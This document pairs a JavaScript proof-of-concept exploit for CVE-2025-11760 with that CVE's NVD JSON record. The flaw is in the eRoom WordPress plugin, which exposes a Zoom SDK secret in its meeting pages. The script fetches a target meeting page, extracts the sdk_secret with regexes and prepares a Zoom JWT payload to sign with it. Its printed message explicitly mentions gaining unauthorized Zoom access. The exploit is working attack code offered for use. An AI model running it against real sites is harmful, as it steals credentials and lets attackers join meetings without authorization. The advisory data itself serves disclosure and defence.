CVE-2025-11760

// CVE-2025-11760 PoC - Extract exposed Zoom SDK Secret // Target: WordPress site with eRoom plugin <= 1.5.6 const targetUrl = 'https://vulnerable-site.com/meeting/123'; async function extractSdkSecret() { try { // Method 1: Fetch page source and extract const response = await fetch(targetUrl); const html = await response.text(); // Search for sdk_secret pattern in JavaScript const secretMatch = html.match(/sdk_secret\s*[=:]\s*["']([^"']+)["']/i); if (secretMatch && secretMatch[1]) { console.log('[+] SDK Secret found:', secretMatch[1]); return secretMatch[1]; } // Method 2: Check for embedded JavaScript variables const scriptMatch = html.match(/var\s+sdk_secret\s*=\s*["']([^"']+)["']/i); if (scriptMatch && scriptMatch[1]) { console.log('[+] SDK Secret found (var):', scriptMatch[1]); return scriptMatch[1]; } console.log('[-] SDK Secret not found in page source'); return null; } catch (error) { console.error('[-] Error:', error.message); return null; } } // Generate JWT using extracted secret (requires jsonwebtoken library) function generateZoomJwt(sdkSecret, meetingNumber) { // JWT payload structure for Zoom SDK const payload = { sdkKey: 'YOUR_SDK_KEY', // Also needs to be extracted appKey: 'YOUR_SDK_KEY', mn: meetingNumber, role: 0, // 0=participant, 1=host iat: Math.round(Date.now() / 1000), exp: Math.round(Date.now() / 1000) + 3600, tokenExp: Math.round(Date.now() / 1000) + 3600 }; // Sign with extracted sdk_secret // const jwt = require('jsonwebtoken'); // return jwt.sign(payload, sdkSecret); console.log('[+] JWT payload prepared, sign with sdk_secret'); return payload; } // Execute PoC (async () => { console.log('[*] CVE-2025-11760 PoC - eRoom Plugin SDK Secret Extraction'); const secret = await extractSdkSecret(); if (secret) { console.log('\n[!] Use extracted secret to generate unauthorized Zoom access'); } })();

{"cve": {"id": "CVE-2025-11760", "sourceIdentifier": "[email protected]", "published": "2025-10-25T02:15:38.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The eRoom – Webinar & Meeting Plugin for Zoom, Google Meet, Microsoft Teams plugin for WordPress is vulnerable to exposure of sensitive information in all versions up to, and including, 1.5.6. This is due to the plugin exposing Zoom SDK secret keys in client-side JavaScript within the meeting view template. This makes it possible for unauthenticated attackers to extract the sdk_secret value, which should remain server-side, compromising the security of the Zoom integration and allowing attackers to generate valid JWT signatures for unauthorized meeting access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eroom-zoom-meetings-webinar/tags/1.5.6/templates/single/meeting_view.php#L173", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3379064%40eroom-zoom-meetings-webinar%2Ftrunk&old=3375935%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=#file4", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0baaa6b7-3884-465e-bae3-46edab6312d4?source=cve", "source": "[email protected]"}]}}